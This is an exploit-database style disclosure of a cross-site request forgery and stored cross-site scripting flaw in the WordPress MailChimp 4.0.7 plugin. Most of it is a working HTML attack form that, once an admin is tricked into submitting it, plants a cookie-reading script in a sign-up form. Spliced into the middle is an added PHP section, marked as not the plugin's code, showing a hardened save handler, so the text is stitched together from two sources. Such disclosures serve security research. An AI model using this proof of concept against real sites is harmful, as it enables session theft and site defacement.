######################
# Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.0.7
# Date: 2016/11/19
######################
#
# PoC:
# I would like to disclose a CSRF and stored XSS vulnerability in the WordPress plugin MailChimp 4.0.7.
# Demo Construction : http://persian-team.ir/showthread.php?tid=192
# The Code for CSRF.html is :
<form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST">
Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;" >
<input type="submit" style="display: none; " />
<input type="hidden" name="_mc4wp_action" value="edit_form" />
<input type="hidden" name="mc4wp_form_id" value="60" />
<input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" />
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" />
<h2>Form Fields</h2>
<textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false">
<script>alert(document.cookie)</script><p>
</textarea>
<input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" />
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" />
</form>
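# The following is an added example and not the plugin's code: a hardened save handler for the `edit_form` action, written against the public WordPress API, that closes both issues above. Note that the PoC form embeds a fixed `_mc4wp_nonce`; a nonce that is verified server-side and bound to the victim's login cannot simply be copied into a third-party page, which is what the first check enforces. The function name, the nonce action string and the storage call are assumptions.

```php
<?php
// Added example, not the plugin's own code. Names such as hardened_mc4wp_save_form
// and the nonce action 'mc4wp_edit_form' are hypothetical; the WordPress functions
// used (check_admin_referer, current_user_can, wp_kses, ...) are real core API.

function hardened_mc4wp_save_form() {
    // Only act on the plugin's own save action.
    if ( empty( $_POST['_mc4wp_action'] ) || 'edit_form' !== $_POST['_mc4wp_action'] ) {
        return;
    }

    // CSRF: the nonce must be validated server-side. check_admin_referer() dies
    // when '_mc4wp_nonce' is missing, expired, or was issued for another user
    // or action, so a nonce pasted into an attacker's page is rejected.
    check_admin_referer( 'mc4wp_edit_form', '_mc4wp_nonce' );

    // Authorization: a nonce is not a capability check; require manage_options too.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    $form_id = isset( $_POST['mc4wp_form_id'] ) ? absint( $_POST['mc4wp_form_id'] ) : 0;
    $raw     = isset( $_POST['mc4wp_form'] ) ? wp_unslash( $_POST['mc4wp_form'] ) : array();
    $name    = isset( $raw['name'] ) ? sanitize_text_field( $raw['name'] ) : '';

    // Stored XSS: the form markup is rendered to every visitor, so filter it.
    // Start from the 'post' allow-list (no <script>, no on* handlers, no
    // javascript: URLs) and add the form controls a sign-up form needs.
    $allowed             = wp_kses_allowed_html( 'post' );
    $allowed['input']    = array( 'type' => true, 'name' => true, 'value' => true,
                                  'placeholder' => true, 'required' => true,
                                  'class' => true, 'id' => true );
    $allowed['textarea'] = array( 'name' => true, 'rows' => true, 'cols' => true,
                                  'class' => true, 'id' => true );
    $allowed['select']   = array( 'name' => true, 'class' => true, 'id' => true );
    $allowed['option']   = array( 'value' => true, 'selected' => true );
    $allowed['label']    = array( 'for' => true, 'class' => true );

    $content = isset( $raw['content'] ) ? wp_kses( $raw['content'], $allowed ) : '';

    // Persist (hypothetical storage via the post API; the plugin's own differs).
    wp_update_post( array( 'ID' => $form_id, 'post_title' => $name, 'post_content' => $content ) );
}
add_action( 'admin_init', 'hardened_mc4wp_save_form' );

// The editor page must emit a matching nonce field for the same action:
// wp_nonce_field( 'mc4wp_edit_form', '_mc4wp_nonce' );
```

# With this handler the payload in the PoC textarea is reduced to `alert(document.cookie)<p>` without its script tags, and the request is refused outright unless it carries a nonce minted for the logged-in user.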
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################